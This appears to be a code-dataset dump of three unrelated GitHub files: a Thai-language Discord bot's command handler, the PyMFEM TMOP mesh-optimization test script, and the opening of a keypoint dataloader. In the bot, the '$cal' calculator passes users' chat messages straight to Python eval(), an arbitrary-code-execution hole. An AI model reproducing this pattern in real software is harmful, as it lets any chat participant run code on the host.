message.reply('เยลโล่ว!', mention_author=True)\n\n if msg.lower().startswith('ma'):\n await message.reply('ลุยยยยยยย', mention_author=True)\n\n if msg.lower().startswith('ฝันดี'):\n await message.reply('ฝันดีคับบบ', mention_author=True)\n\n if msg.lower().startswith('เนอะ'):\n await message.reply('อื้อ', mention_author=True)\n\n if 'จิง' in msg:\n await message.channel.send('ฮ้อยย้าา')\n\n # food menu\n if msg.startswith('กินไร'):\n menu = [\"กระเพราหมูสับ\", \"โจ๊กหมูขอฮาๆ\", 'ข้าวไข่เจียว', 'ข้าวไข่ดาว', 'ข้าวไข่ข้น', 'ข้าวไข่ต้ม']\n idx_answer = random.randint(0, len(menu) - 1)\n result = menu[idx_answer]\n await message.reply(result, mention_author=True)\n\n # guessing game\n if msg.startswith('$guess'):\n await message.channel.send('ทายเลขใน 1 ถึง 10 ซิ')\n\n def is_correct(m):\n return m.author == message.author and m.content.isdigit()\n\n answer = random.randint(1, 10)\n\n try:\n guess = await self.wait_for('message', check=is_correct, timeout=5.0)\n except asyncio.TimeoutError:\n return await message.channel.send(\n 'ช้าปายย {}.'.format(answer))\n if int(guess.content) == answer:\n await message.channel.send('แม่นน!')\n else:\n await message.channel.send(\n 'ผิด! ตอบ {} โว้ยย'.format(answer))\n\n # anonymous texting command\n if msg.startswith('$send'):\n channel = msg.split(\" \", 2)[1]\n text = msg.split(\" \", 2)[2]\n if (channel == \"general\"):\n general_channel = client.get_channel(694382265081266280)\n await general_channel.send(text)\n elif (channel == \"music\"):\n music_channel = client.get_channel(791315320648368142)\n await music_channel.send(text)\n elif (channel == \"study-room\"):\n study_room_channel = client.get_channel(808174559529926666)\n await study_room_channel.send(text)\n elif (channel == \"gaming\"):\n gaming_channel = client.get_channel(809839995287633950)\n await gaming_channel.send(text)\n else:\n test_bot_channel = client.get_channel(928269670635671653) # test channel\n await test_bot_channel.send(text)\n\n # add new words\n if msg.startswith('$add'):\n new_word = msg.split(\"$add\", 1)[1]\n add_words(new_word)\n await message.channel.send(\"เพิ่มละจ้า\")\n\n # delete word in interact\n if msg.startswith(\"$del\"):\n if msg.split(\"$del\", 1)[1] == '':\n interact = list(db[\"interact\"])\n list_of_word = \", \".join(interact)\n await message.channel.send(\"`\" + list_of_word + \"`\")\n return await message.channel.send(interact)\n\n interact = []\n if \"interact\" in db.keys():\n index = msg.split(\"$del\", 1)[1].strip()\n delete_word(index)\n interact = list(db[\"interact\"])\n list_of_word = \", \".join(interact)\n await message.channel.send(\"`\" + list_of_word + \"`\")\n else:\n await message.channel.send(\"ว่างแย้วครับพี่\")\n\n # list of words\n if msg.startswith('$list'):\n interact = []\n if \"interact\" in db.keys():\n interact = list(db[\"interact\"])\n list_of_word = \", \".join(interact)\n await message.channel.send(\"`\" + list_of_word + \"`\")\n else:\n await message.channel.send(\"ว่างครับพี่\")\n\n # responding command\n if msg.startswith(\"$responding\"):\n value = msg.split(\"$responding \", 1)[1]\n\n if value.lower() == \"true\":\n db[\"responding\"] = True\n await message.channel.send(\"online now!\")\n else:\n db[\"responding\"] = False\n await message.channel.send(\"offline bye!\")\n\n # Display all commands usage\n if msg.startswith('$help'):\n embed = discord.Embed(\n title=\"How to use commands\",\n url=\"https://discordpy.readthedocs.io/en/stable/\",\n description=\"use prefix $ | Automatically send schedule at 7 am\",\n 
color=discord.Color.blue()\n )\n\n command_lists = [\n {'name': '$guess', 'usage': 'Guess number from 1-10\\nYou only have 1 guess!'},\n {'name': '$send', 'usage': 'Send anonymous message\\n`send [channel] [text]`'},\n {'name': '$responding', 'usage': 'Toggle interact message\\n`responding [bool]`'},\n {'name': '$list', 'usage': 'Display all interacting words in database'},\n {'name': '$add', 'usage': 'Add word \\n`add [word]`'},\n {'name': '$del', 'usage': 'Delete word\\n`del [index / word]`'},\n {'name': '$random', 'usage': 'Random from list\\n`random [list]`'},\n {'name': '$qrcode', 'usage': 'Create QR-Code\\n`qrcode [data / link]`'},\n {'name': '$poll', 'usage': 'Create poll with reaction\\n`poll [title] [list]`'},\n {'name': '$code', 'usage': 'Create codeblock\\n`code [language]`'},\n {'name': '$cal', 'usage': 'Act as a calculator\\nType `บาย` to quit'},\n {'name': '$base', 'usage': 'Convert number base\\n`base [number] [old_base] [new_base]`'},\n {'name': '$master1', 'usage': 'Master Theorem for dividing function\\n`master1 [a] [b] [d]`'},\n {'name': '$master2', 'usage': 'Master Theorem for decrease function\\n`master2 [a] [b] [k]`'},\n {'name': '$plot', 'usage': 'Plot random points with various size\\n`plot [number]`'},\n {'name': '$inform', 'usage': 'Inform current `author`\\'s schedule'},\n {'name': '$job', 'usage': 'Filter jobs from website\\n`job [keyword] [filter]`'},\n {'name': '$noti', 'usage': 'Notification from MCV\\n`noti [days] [type]`'},\n {'name': '$invite', 'usage': 'Send invitation link'},\n {'name': '$meme', 'usage': 'Random meme go brrrr'},\n {'name': '$join', 'usage': 'join voice channel'},\n ]\n\n # embed.set_thumbnail(url=\"https://i.pinimg.com/originals/13/8d/52/138d52a8f429510e2c16bd67990dae3c.jpg\")\n for command in command_lists:\n embed.add_field(\n name=command['name'],\n value=command['usage'],\n inline=True\n )\n\n # embed.set_author(name=\"Aqioz\")\n Aqioz_id = os.environ['AQIOZ_ID']\n embed.add_field(name=\"__**Author**__\", value=f\"> Bhuribhat@gmail.com\\n> {Aqioz_id}\", inline=False)\n await message.channel.send(embed=embed, view=GithubButton())\n\n # calculator command\n if msg.startswith(\"$cal\"):\n await message.channel.send('ก็มาดิ')\n try:\n equation = await self.wait_for('message', timeout=10.0)\n if equation.content == \"บาย\":\n await message.channel.send(\"บายน้า\")\n except asyncio.TimeoutError:\n return await message.channel.send('ไปละปวดหมอง')\n while equation.content != \"บาย\":\n answer = \"ตอบ \" + str(eval(equation.content))\n await message.channel.send(answer)\n try:\n equation = await self.wait_for('message', timeout=10.0)\n if equation.content == \"บาย\":\n await message.channel.send(\"บายน้า\")\n except asyncio.TimeoutError:\n return await message.channel.send('ไปละปวดหมอง')\n\n # coding template\n if msg.startswith(\"$code\"):\n language = msg.split(\"$code\", 1)[1].strip()\n study_room_channel = client.get_channel(808174559529926666)\n\n if language != '':\n embedVar = discord.Embed(\n title=\"Coding Template\",\n description=f\"` ```{language}\\n`\\t `\\n``` `\",\n color=0x00ff00\n )\n embedVar.add_field(\n name=\"Description\",\n value=f\"Template for {language} language\",\n inline=False\n )\n await study_room_channel.send(embed=embedVar)\n else:\n await study_room_channel.send(view=CodeMenu())\n\n # random list of thing split by comma (\",\")\n if msg.startswith(\"$random\"):\n list_thing = msg.split(\"$random\", 1)[1].split(\",\")\n if (list_thing == ['']):\n result = \"overflow\"\n value = \"None\"\n else:\n result = 
random.choice(list_thing)\n value = \", \".join(list_thing)\n embedVar = discord.Embed(title=\"Result\", description=f\"`{result.strip()}`\", color=0xe91e63)\n embedVar.add_field(name=\"Randoming from\", value=value, inline=False)\n await message.channel.send(embed=embedVar)\n\n # calculate time complex using master theorem divide function\n if msg.startswith(\"$master1\"):\n coef = msg.split(\"$master1\", 1)[1].split()\n if (len(coef) == 0):\n await message.channel.send(\"__**usage**__: `$master1 a b d`\")\n result = \"Big Thetha\"\n value = \"`T(n) = aT(n/b) + Θ(n^d)`\\n\\n__**Conditions**__:\\na >= 1, b > 1, c = log_b(a), d >= 0, T(0) = 1\"\n else:\n if (len(coef) > 3):\n await message.channel.send(\"*Invalid Input..*\")\n return\n a, b, d = [int(num) for num in coef]\n if a < 1 or b <= 1 or d < 0:\n await message.channel.send(\"*Invalid Input..*\")\n return\n c = math.log(a, b)\n\n # convert to integer if not decimal\n if is_integer_num(a):\n a = math.ceil(a)\n else:\n a = round(a, 2)\n if is_integer_num(b):\n b = math.ceil(b)\n else:\n b = round(b, 2)\n if is_integer_num(c):\n c = math.ceil(c)\n else:\n c = round(c, 2)\n if is_integer_num(d):\n d = math.ceil(d)\n else:\n d = round(d, 2)\n str_c = f\"log_{b}({a})\"\n\n if a == 1:\n a = ''\n if d == 0:\n value = f\" T(n) = {a}T(n/{b}) + 1\"\n elif d == 1:\n value = f\"T(n) = {a}T(n/{b}) + Θ(n)\"\n else:\n value = f\"T(n) = {a}T(n/{b}) + Θ(n^{d})\"\n if d < c:\n await message.channel.send(\"Master theorem case 1 : d < c\")\n if not is_integer_num(c):\n result = f\"Θ(n^{str_c}) = Θ(n^{c})\"\n else:\n if c == 1:\n result = \"Θ(n)\"\n else:\n result = f\"Θ(n^{c})\"\n elif d == c:\n await message.channel.send(\"Master theorem case 2 : d = c\")\n if not is_integer_num(c):\n result = f\"Θ(n^{str_c}log(n)) = Θ(n^{str_c}log(n))\"\n else:\n if c == 0:\n result = \"Θ(log(n)\"\n elif c == 1:\n result = \"Θ(nlog(n)\"\n else:\n result = f\"Θ(n^{c}log(n)\"\n elif d > c:\n await message.channel.send(\"Master theorem case 3 : d > c\")\n if d == 1:\n result = \"Θ(n)\"\n else:\n result = f\"Θ(n^{d})\"\n\n embedVar = discord.Embed(title=\"Divide Function\", description=value, color=0xd69f09)\n embedVar.add_field(name=\"Time Complexity\", value=f\"||`{result.strip()}`||\", inline=False)\n await message.channel.send(embed=embedVar)\n\n # calculate time complex using master theorem decreasing function\n if msg.startswith(\"$master2\"):\n coef = msg.split(\"$master2\", 1)[1].split()\n if (len(coef) == 0):\n await message.channel.send(\"__**usage**__: `$master2 a b k`\")\n result = \"Big Oh Notation\"\n value = \"`T(n) = aT(n - b) + O(n^k)`\\n\\n__**Conditions**__:\\na >= 1, b > 0, k >= 0, T(0) = 1\"\n else:\n if (len(coef) > 3):\n await message.channel.send(\"*Invalid Input..*\")\n return\n a, b, k = [int(num) for num in coef]\n if a < 1 or b <= 0 or k < 0:\n await message.channel.send(\"*Invalid Input..*\")\n return\n\n # convert to integer if it has no decimal, 2 precision otherwise\n if is_integer_num(a):\n a = math.ceil(a)\n else:\n a = round(a, 2)\n if is_integer_num(b):\n b = math.ceil(b)\n else:\n b = round(b, 2)\n if is_integer_num(k):\n k = math.ceil(k)\n else:\n k = round(k, 2)\n\n if a == 1:\n a = ''\n if k == 0:\n value = f\" T(n) = {a}T(n - {b}) + 1\"\n elif k == 1:\n value = f\" T(n) = {a}T(n - {b}) + O(n)\"\n else:\n value = f\" T(n) = {a}T(n - {b}) + O(n^{k})\"\n a = 1 if a == '' else a\n\n if a == 1:\n await message.channel.send(\"Master theorem case 1 : a = 1\")\n if k + 1 > 1:\n result = f\"O(n^{k + 1})\"\n else:\n result = f\"O(n)\"\n\n 
elif a > 1:\n await message.channel.send(\"Master theorem case 2 : a > 1\")\n if k > 0:\n if k == 1:\n k = \"O(n\"\n else:\n k = f\"O(n^{k}\"\n if b > 1:\n result = f\"{k} * {a}^(n/{b}))\"\n else:\n result = f\"{k} * {a}^n)\"\n else:\n if b > 1:\n result = f\"O({a}^(n/{b}))\"\n else:\n result = f\"O({a}^n)\"\n\n embedVar = discord.Embed(title=\"Decrease Function\", description=value, color=0xd69f09)\n embedVar.add_field(name=\"Time Complexity\", value=f\"||`{result.strip()}`||\", inline=False)\n await message.channel.send(embed=embedVar)\n\n # inform\n if msg.startswith(\"$inform\"):\n day_of_week = datetime.today().strftime('%A').lower()\n if (day_of_week != \"saturday\") and (day_of_week != \"sunday\"):\n embedVar = discord.Embed(\n title=\"Schedule\",\n url=\"https://docs.google.com/document/d/1C1sF4aS6kFjqWBtU91vSYUvTSxdh9xxXhA9LeUUTbXg/edit#heading=h.8sb6c0hcl62a\",\n description=schedule[day_of_week],\n color=discord.Color.blue())\n embedVar.add_field(\n name=\"Days of week\",\n value=\"For \" + datetime.today().strftime('%A') +\n \" | [MCV](https://www.mycourseville.com/?q=courseville)\" +\n \" [Grader](https://nattee.net/grader)\",\n inline=False)\n await message.channel.send(embed=embedVar)\n\n # plot graph within 10,000 number\n if msg.startswith(\"$plot\"):\n number = int(msg.split(\"$plot \", 1)[1])\n if (number >= 1000):\n await message.channel.send(\"too much bro\")\n else:\n data = {\n 'a': np.arange(number),\n 'c': np.random.randint(0, number, number),\n 'd': np.random.randn(number)\n }\n data['b'] = data['a'] + 10 * np.random.randn(number)\n data['d'] = np.abs(data['d']) * 100\n\n # Set background color and axis\n plt.figure(figsize=(10, 6), facecolor=\"#303340\")\n ax = plt.axes()\n ax.set_facecolor(\"#303340\")\n ax.tick_params(axis=\"x\", color=\"white\")\n ax.tick_params(axis=\"y\", color=\"white\")\n plt.xticks(color=\"white\")\n plt.yticks(color=\"white\")\n\n # plot graph\n plt.scatter('a', 'b', c='c', s='d', data=data)\n plt.xlabel('Data', color=\"cyan\")\n plt.ylabel('Value', color=\"cyan\")\n plt.title(r'$\\Sigma=$' + str(number), color=\"orange\")\n\n await message.channel.send(f\"min data = {getMinPoint(data)}\")\n await message.channel.send(f\"max data = {getMaxPoint(data)}\")\n\n # send graph to channel\n plt.savefig('.\\\\assets\\\\graph.png', bbox_inches='tight')\n await message.channel.send(file=discord.File('.\\\\assets\\\\graph.png'))\n\n # QR-Code PNG\n if msg.startswith(\"$qrcode\"):\n QR = qrcode.QRCode(version=1, box_size=10, border=2)\n data = msg.split(\"$qrcode \", 1)[1]\n QR.add_data(data)\n QR.make(fit=True)\n\n # fill_color='black', back_color='white'\n img = QR.make_image()\n img.save('.\\\\assets\\\\QRCode.png')\n\n # send picture to channel\n await message.channel.send(file=discord.File('.\\\\assets\\\\QRCode.png'))\n\n if msg.startswith(\"$base\"):\n attr = msg.split(\"$base\", 1)[1].split()\n if (len(attr) == 0):\n await message.channel.send(\"__**usage**__: `$base number base convert_base`\")\n result = \"Number in base X\"\n value = \"base >= 2\"\n base = 'n'\n convert_base = 'x'\n else:\n if (len(attr) > 3):\n await message.channel.send(\"*Invalid Input..*\")\n return\n number, base, convert_base = [int(num) for num in attr]\n result = numberAnyBase(number, base, convert_base)\n value = number\n\n embedVar = discord.Embed(title=\"From base \" + str(base), description=value, color=0xa84300)\n embedVar.add_field(name=\"Convert to base \" + str(convert_base), value=f\"||`{result.strip()}`||\", inline=False)\n await 
message.channel.send(embed=embedVar)\n\n # job seeker with csv file\n if msg.startswith(\"$job\"):\n attr = msg.split(\"$job\", 1)[1].split()\n if (len(attr) == 0):\n await message.channel.send(\"__**usage**__: `$job keyword unwanted_skill`\")\n return\n else:\n if (len(attr) > 2):\n await message.channel.send(\"*Invalid Input..*\")\n return\n\n keyword, unwant_skill = attr\n df = find_jobs(keyword, unwant_skill)\n df = df.drop(['Job Description', 'More Information', 'Skills Required'], axis=1)\n \n length = df.shape[0]\n df = df.head(5).to_string()\n\n embedVar = discord.Embed(title=f\"All Jobs with {keyword} skill\", description=f\"filter out {unwant_skill}\", color=0xa84300)\n embedVar.add_field(name=f\"Found {length} jobs\", value=f\"```{df}```\", inline=False)\n await message.channel.send(embed=embedVar)\n await message.channel.send(\"for more detail please check `csv file`\")\n await message.channel.send(file=discord.File(\".\\\\assets\\\\jobs.csv\"))\n\n # poll with reactions\n if msg.startswith(\"$poll\"):\n emoji = ['1️⃣','2️⃣','3️⃣','4️⃣','5️⃣','6️⃣','7️⃣','8️⃣','9️⃣']\n choices = msg.split(\"$poll\")[1].split()\n if (len(choices) == 0):\n await message.channel.send(\"__**usage**__: `$poll title `\")\n return\n if (len(choices) > len(emoji) + 1):\n await message.channel.send(\"too much bro\")\n return\n\n title = choices[0]\n display_choices = ''\n for i in range(len(choices[1:])):\n display_choices += f\"{emoji[i]} {choices[1:][i]}\\n\"\n embedVar = discord.Embed(title=\"Please vote!\", color=0x64395d)\n embedVar.add_field(name=title, value=f\"```{display_choices}```\", inline=False)\n pollmsg = await message.channel.send(embed=embedVar)\n\n for i in range(len(choices[1:])):\n await pollmsg.add_reaction(emoji[i])\n\n # get mcv notifications\n if msg.startswith(\"$noti\"):\n attr = msg.split(\"$noti\")[1].split()\n if len(attr) > 2:\n await message.channel.send(\"__**usage**__: `$noti days type`\")\n await message.channel.send(\"type must be one of `Assignment, Material, Announcement`\")\n return\n\n if len(attr) == 0:\n await message.channel.send(\"You can select up to 2 filters!\")\n await message.channel.send(view=NotiMenu())\n return\n elif len(attr) == 1:\n if attr[0].isnumeric():\n notifications = get_notifications(days=attr[0])\n elif attr[0].title() in ['Assignment', 'Material', 'Announcement']:\n notifications = get_notifications(select=attr[0])\n else:\n await message.channel.send(\"type must be one of `Assignment, Material, Announcement`\")\n return\n else:\n notifications = get_notifications(attr[0], attr[1])\n \n embedVar = discord.Embed(title=\"MCV Notification\", color=discord.Color.blue())\n for notification in notifications:\n value = f\"```{notification[1]}```{notification[2]}\"\n embedVar.add_field(name=notification[0], value=value, inline=False)\n await message.channel.send(embed=embedVar)\n\n # send meme\n if msg.startswith(\"$meme\"):\n meme_stealer()\n await message.channel.send(file=discord.File('.\\\\assets\\\\meme.png'))\n\n # send invitation\n if msg.startswith(\"$invite\"):\n inv = await message.channel.create_invite()\n await message.channel.send(\"Click the button below to invite someone!\", view=InviteButton(str(inv)))\n\n # join voice channel\n if msg.startswith(\"$join\"):\n channel = message.author.voice.channel\n await channel.connect()\n\n\nif __name__ == '__main__':\n intents = discord.Intents.default()\n intents.message_content = True\n\n # driver code\n client = DiscordClient(intents=intents)\n keep_alive()\n 
client.run(TOKEN)\n","repo_name":"Bhuribhat/Discord-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":27535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30687833282","text":"#\n# based on meshOptMWE.cpp from Ketan Mittal\n#\n# python test_tmop.py -m ../data/square01.mesh -o 2 -rs 2 -mid 80 -tid 5 -ni 50 -qo 4 -vl 2 -ae 0\nimport sys\nimport os\nfrom os.path import expanduser, join\nimport numpy as np\n\nif len(sys.argv) > 1 and sys.argv[1] == '-p':\n import mfem.par as mfem\n use_parallel = True\n from mfem.common.mpi_debug import nicePrint as print\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n sys.argv = [sys.argv[0]] + sys.argv[2:]\n\nelse:\n import mfem.ser as mfem\n use_parallel = False\n myid = 0\n\nclass discrete_size_2d(mfem.PyCoefficient):\n def EvalValue(self, x):\n opt = 2;\n small = 0.001\n big = 0.01\n val = 0.;\n \n xc = x[0] - 0.0\n yc = x[1] - 0.5\n r = np.sqrt(xc*xc + yc*yc)\n r1 = 0.45\n r2 = 0.55\n sf=30.0\n val = 0.5*(1+np.tanh(sf*(r-r1))) - 0.5*(1+np.tanh(sf*(r-r2)))\n\n val = max(0.,val)\n val = min(1.,val)\n\n return val * small + (1.0 - val) * big\n \ndef run(args):\n mesh_file = expanduser(\n join(os.path.dirname(__file__), '..', 'data', args.mesh))\n\n mesh_poly_deg = args.order\n rs_levels = args.refine_serial\n metric_id = args.metric_id\n target_id = args.target_id\n quad_type = args.quad_type\n quad_order = args.quad_order\n solver_type = args.solver_type\n lin_solver = args.lin_solver\n normalization = args.normalization\n\n verbosity_level = args.verbosity_level\n \n n_hr_iter=args.n_hr_iter\n n_h_iter=args.n_h_iter\n \n solver_iter = args.newton_iters\n solver_rtol= args.newton_rel_tolerance\n solver_art_type = args.adaptive_rel_tol\n max_lin_iter = args.lin_iter\n hradaptivity = args.hr_adaptivity\n visualization = not args.no_visualization\n adapt_eval= args.adaptivity_evaluator\n\n devopt = \"cpu\";\n\n # 2. Initialize and refine the starting mesh.\n mesh = mfem.Mesh(mesh_file, 1, 1, False)\n for i in range(rs_levels):\n mesh.UniformRefinement()\n dim = mesh.Dimension();\n\n fec = mfem.H1_FECollection(mesh_poly_deg, dim)\n fespace = mfem.FiniteElementSpace(mesh, fec, dim)\n\n mesh.SetNodalFESpace(fespace)\n\n b = mfem.Vector(0)\n\n x = mfem.GridFunction(fespace)\n mesh.SetNodalGridFunction(x)\n x.SetTrueVector()\n x.SetFromTrueVector()\n \n # 9. Save the starting (prior to the optimization) mesh to a file. This\n # output can be viewed later using GLVis: \"glvis -m perturbed.mesh\".\n mesh.Print(\"perturbed.mesh\")\n\n # 10. 
Store the starting (prior to the optimization) positions.\n x0 = mfem.GridFunction(fespace)\n x0.Assign(x)\n\n metric = mfem.tmop.TMOP_Metric_080(0.5)\n\n ind_fec = mfem.H1_FECollection(mesh_poly_deg, dim)\n ind_fes = mfem.FiniteElementSpace(mesh, ind_fec)\n size = mfem.GridFunction(ind_fes)\n\n \n if target_id == 5: # Discrete size 2D or 3D\n target_t = mfem.tmop.TargetConstructor.IDEAL_SHAPE_GIVEN_SIZE\n \n tc = mfem.tmop.DiscreteAdaptTC(target_t)\n \n if adapt_eval == 0:\n tc.SetAdaptivityEvaluator(mfem.tmop.AdvectorCG())\n else:\n if \"InterpolatorFP\" in dir(mfem.tmop):\n evaluator = mfem.tmop.InterpolatorFP()\n tc.SetAdaptivityEvaluator(evaluator)\n else:\n assert False, \"MFEM is not built with GSLIB.\"\n if dim == 2:\n #size_coeff = mfem.FunctionCoefficient(discrete_size_2d)\n size_coeff = discrete_size_2d()\n size.ProjectCoefficient(size_coeff)\n else:\n assert False, \"only dim == 2 supported for this MWE.\"\n \n tc.SetSerialDiscreteTargetSize(size)\n target_c = tc;\n\n else:\n print(\"Unknown target_id: \" + str(target_id))\n return\n\n if target_c is None:\n target_c = mfem.tmop.TargetConstructor(target_t);\n\n target_c.SetNodes(x0)\n \n tmop_integ = mfem.tmop.TMOP_Integrator(metric, target_c)\n \n # Setup the quadrature rules for the TMOP integrator.\n if quad_type == 1:\n irules = mfem.IntegrationRules(0, mfem.Quadrature1D.GaussLobatto)\n elif quad_type == 2: \n irules = mfem.IntRules\n elif quad_type == 3: \n irules = mfem.IntegrationRules(0, mfem.Quadrature1D.ClosedUniform)\n else:\n print( \"Unknown quad_type: \" + str(quad_type))\n return 3\n\n tmop_integ.SetIntegrationRules(irules, quad_order)\n\n if normalization:\n tmop_integ.EnableNormalization(x0)\n\n a = mfem.NonlinearForm(fespace)\n a.AddDomainIntegrator(tmop_integ)\n\n # For HR tests, the energy is normalized by the number of elements.\n init_energy = a.GetGridFunctionEnergy(x);\n \n # Visualize the starting mesh and metric values.\n # Note that for combinations of metrics, this only shows the first metric.\n if visualization:\n mfem.tmop.vis_tmop_metric_s(mesh_poly_deg, metric, target_c, mesh, \"Initial metric values\", 0);\n\n # 13. Fix all boundary nodes, or fix only a given component depending on the\n # boundary attributes of the given mesh. Attributes 1/2/3 correspond to\n # fixed x/y/z components of the node. Attribute 4 corresponds to an\n # entirely fixed node. Other boundary attributes do not affect the node\n # movement boundary conditions.\n ess_bdr = mfem.intArray([1]*mesh.bdr_attributes.Max())\n a.SetEssentialBC(ess_bdr);\n\n\n # 14. 
As we use the Newton method to solve the resulting nonlinear system,\n # here we set up the linear solver for the system's Jacobian.\n linsol_rtol = 1e-12\n if lin_solver == 0:\n S = mfem.DSmoother(1, 1.0, max_lin_iter)\n elif lin_solver == 1:\n cg = mfem.CGSolver()\n cg.SetMaxIter(max_lin_iter)\n cg.SetRelTol(linsol_rtol)\n cg.SetAbsTol(0.0)\n cg.SetPrintLevel(3 if verbosity_level >= 2 else -1)\n S = cg\n else:\n minres = mfem.MINRESSolver()\n minres.SetMaxIter(max_lin_iter)\n minres.SetRelTol(linsol_rtol)\n minres.SetAbsTol(0.0)\n if verbosity_level > 2:\n minres.SetPrintLevel(1)\n minres.SetPrintLevel(3 if verbosity_level == 2 else -1)\n if lin_solver == 3 or lin_solver == 4:\n ds = mfem.DSmoother((0 if lin_solver == 3 else 1), 1.0, 1)\n ds.SetPositiveDiagonal(True)\n minres.SetPreconditioner(ds)\n S = minres\n \n # Perform the nonlinear optimization.\n ir = irules.Get(fespace.GetFE(0).GetGeomType(), quad_order)\n solver = mfem.tmop.TMOPNewtonSolver(ir, solver_type)\n solver.SetIntegrationRules(irules, quad_order)\n if solver_type == 0:\n # Specify linear solver when we use a Newton-based solver.\n solver.SetPreconditioner(S)\n\n solver.SetMaxIter(solver_iter)\n solver.SetRelTol(solver_rtol)\n solver.SetAbsTol(0.0)\n if solver_art_type > 0:\n solver.SetAdaptiveLinRtol(solver_art_type, 0.5, 0.9)\n\n solver.SetPrintLevel(1 if verbosity_level >= 1 else -1)\n\n hr_solver = mfem.tmop.TMOPHRSolver(mesh, a, solver, x, False, hradaptivity,\n mesh_poly_deg, metric_id, n_hr_iter, n_h_iter)\n hr_solver.AddGridFunctionForUpdate(x0)\n hr_solver.Mult()\n\n # 15. Save the optimized mesh to a file. This output can be viewed later\n # using GLVis: \"glvis -m optimized.mesh\".\n mesh.Print(\"optimized.mesh\", 14)\n\n fin_energy = a.GetGridFunctionEnergy(x)\n print(\"Initial strain energy: \" + \"{:g}\".format(init_energy))\n print(\" Final strain energy: \" + \"{:g}\".format(fin_energy))\n print(\"The strain energy decreased by: \" + \n \"{:g}\".format((init_energy - fin_energy) * 100.0 / init_energy))\n\n # 16. Visualize the final mesh and metric values.\n if visualization:\n mfem.tmop.vis_tmop_metric_s(mesh_poly_deg, metric, target_c, mesh, \"Final metric values\", 600)\n\n # 17. 
Visualize the mesh displacement.\n if visualization:\n x0 -= x\n sock = mfem.socketstream(\"localhost\", 19916)\n sock << \"solution\\n\" << mesh << x0\n sock.flush()\n sock << \"window_title 'Displacements'\\n\" << \"window_geometry \"\n sock << 1200 << \" \" << 0 << \" \" << 600 << \" \" << 600 << \"\\n\"\n sock << \"keys jRmclA\"\n sock.flush()\n\n\nif __name__ == \"__main__\":\n from mfem.common.arg_parser import ArgParser\n\n parser = ArgParser(description='meshOptMWE')\n parser.add_argument('-m', '--mesh',\n default='square01.mesh', # icf.mesh\n action='store', type=str,\n help='Mesh file to use.')\n parser.add_argument('-o', '--order',\n action='store', default=1, type=int,\n help=\"Finite element order (polynomial degree) or -1 for isoparametric space.\")\n parser.add_argument('-rs', '--refine-serial',\n action='store', default=2, type=int,\n help=\"Number of times to refine the mesh uniformly in serial\")\n parser.add_argument(\"-mid\", \"--metric-id\",\n action=\"store\", default=80, type=int,\n help=\"\\n\".join([\"Mesh optimization metric:\",\n \"\\tT-metrics\",\n \"2 : 0.5|T|^2/tau-1 -- 2D shape (condition number)\\n\\t\"]))\n parser.add_argument(\"-tid\", \"--target-id\",\n action=\"store\", default=5, type=int, \n help=\"\\n\".join([\"Target (ideal element) type:\",\n \"\\t5: Ideal shape, given size (in physical space)\"]))\n parser.add_argument(\"-qt\", \"--quad-type\",\n action=\"store\", default=1, type=int, \n help=\"\\n\".join([\"Quadrature rule type:\",\n \"\\t1: Gauss-Lobatto\",\n \"\\t2: Gauss-Legendre\",\n \"\\t3: Closed uniform points\"]))\n parser.add_argument(\"-qo\", \"--quad_order\",\n action=\"store\", default=4, type=int, \n help=\"Order of the quadrature rule.\")\n parser.add_argument(\"-st\", \"--solver-type\",\n action=\"store\", default=0, type=int,\n help=\"Type of solver: (default) 0: Newton, 1: LBFGS\")\n parser.add_argument(\"-ni\", \"--newton-iters\",\n action=\"store\", default=80, type=int, \n help=\"Maximum number of Newton iterations.\")\n parser.add_argument(\"-rtol\", \"--newton-rel-tolerance\",\n action=\"store\", default=1e-10, type=float,\n help=\"Relative tolerance for the Newton solver.\")\n parser.add_argument(\"-art\", \"--adaptive-rel-tol\",\n action=\"store\", default=0, type=int, \n help=\"\\n\".join([\"Type of adaptive relative linear solver tolerance:\",\n \"\\t0: None (default)\",\n \"\\t1: Eisenstat-Walker type 1\",\n \"\\t2: Eisenstat-Walker type 2\"]))\n parser.add_argument(\"-ls\", \"--lin-solver\",\n action=\"store\", default=2, type=int, \n help=\"\\n\".join([\"Linear solver:\",\n \"\\t0: l1-Jacobi\",\n \"\\t1: CG\",\n \"\\t2: MINRES\",\n \"\\t3: MINRES + Jacobi preconditioner\",\n \"\\t4: MINRES + l1-Jacobi preconditioner\"]))\n parser.add_argument(\"-li\", \"--lin-iter\",\n action=\"store\", default=100, type=int, \n help=\"Maximum number of iterations in the linear solve.\")\n parser.add_argument(\"-hr\", \"--hr-adaptivity\", \n action='store_true',\n help=\"Enable hr-adaptivity.\")\n parser.add_argument(\"-nor\", \"--normalization\", \n action='store_true',\n help=\"Make all terms in the optimization functional unitless.\")\n parser.add_argument('-no-vis', '--no-visualization',\n action='store_true',\n help='Disable GLVis visualization')\n parser.add_argument(\"-vl\", \"--verbosity-level\",\n action=\"store\", default=2, type=int, \n help=\"Set the verbosity level - 0, 1, or 2.\")\n\n\n parser.add_argument(\"-ae\", \"--adaptivity-evaluator\",\n action=\"store\", default=1, type=int, \n help=\"0 - Advection based 
(DEFAULT), 1 - GSLIB.\");\n\n parser.add_argument(\"-nhr\", \"--n_hr_iter\",\n action=\"store\", default=5, type=int,\n help=\"Number of hr-adaptivity iterations.\")\n\n parser.add_argument(\"-nh\", \"--n_h_iter\",\n action=\"store\", default=1, type=int,\n help=\"Number of h-adaptivity iterations per r-adaptivity\")\n \n args = parser.parse_args()\n parser.print_options(args)\n \n run(args)\n","repo_name":"mfem/PyMFEM","sub_path":"test/test_tmop.py","file_name":"test_tmop.py","file_ext":"py","file_size_in_byte":13613,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"48"} +{"seq_id":"39648823076","text":"\"\"\"\nugvkp Dataloader\njieli_cn@163.com\n2019/1/11\n\"\"\"\nimport os\n\ntry:\n import ujson as json\nexcept ImportError:\n import json\n\nfrom torchvision.transforms import ToTensor\nfrom training.datasets.ugv_data.UGV_data_pipeline import UGVKeyPoints\nfrom training.datasets.dataloader import sDataLoader\n\n\ndef get_loader(json_path, data_dir, mask_dir, inp_size, feat_stride, preprocess,\n batch_size, params_transform, training=True, shuffle=True, num_workers=1, aug=False, classification = False):\n \"\"\" Build a COCO dataloader\n :param json_path: string, path to jso file\n :param datadir: string, path to coco data\n :returns : the data_loader\n \"\"\"\n\n json_data = list()\n if 